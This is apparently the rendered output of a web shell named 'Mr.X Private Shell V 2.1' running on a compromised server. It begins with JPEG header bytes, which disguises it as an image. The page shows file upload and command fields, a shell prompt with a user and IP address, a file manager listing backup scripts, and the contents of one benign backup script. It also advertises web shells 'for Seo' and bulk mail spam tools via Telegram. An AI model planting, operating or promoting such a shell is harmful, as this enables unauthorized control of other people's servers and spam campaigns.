����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# if NETFS_KEEP_OLD_BACKUP_COPY is not empty then move old NETFS_PREFIX directory to NETFS_PREFIX.old

[ -z "${NETFS_KEEP_OLD_BACKUP_COPY}" ] && return

# do not do this for tapes and special attention for file:///path
local scheme="$( url_scheme "$BACKUP_URL" )"
local path="$( url_path "$BACKUP_URL" )"
local opath="$( backup_path "$scheme" "$path" )"

# if $opath is empty return silently (e.g. scheme tape)
[ -z "$opath" ] && return 0

if ! test -f "${opath}/.lockfile" ; then
    if test -d "${opath}" ; then
        rm -rf $v "${opath}.old" || Error "Could not remove '${opath}.old'"
        mv -f $v "${opath}" "${opath}.old" || Error "Could not move '${opath}'"
    fi
else
    # lockfile was already made through the output workflow (hands off)
    Log "Lockfile '${opath}/.lockfile' found (created by output workflow)."
fi
# the ${BUILD_DIR}/outputfs/${NETFS_PREFIX} will be created by backup/NETFS/default/200_make_prefix_dir.sh

Filemanager

Name Type Size Permission Actions
100_mount_NETFS_path.sh File 140 B 0644
150_save_copy_of_prefix_dir.sh File 940 B 0644
200_make_prefix_dir.sh File 568 B 0644
250_create_lock.sh File 568 B 0644
400_copy_disk_struct_files.sh File 772 B 0644
500_start_clone.sh File 2.28 KB 0644
970_remove_lock.sh File 277 B 0644
980_umount_NETFS_dir.sh File 154 B 0644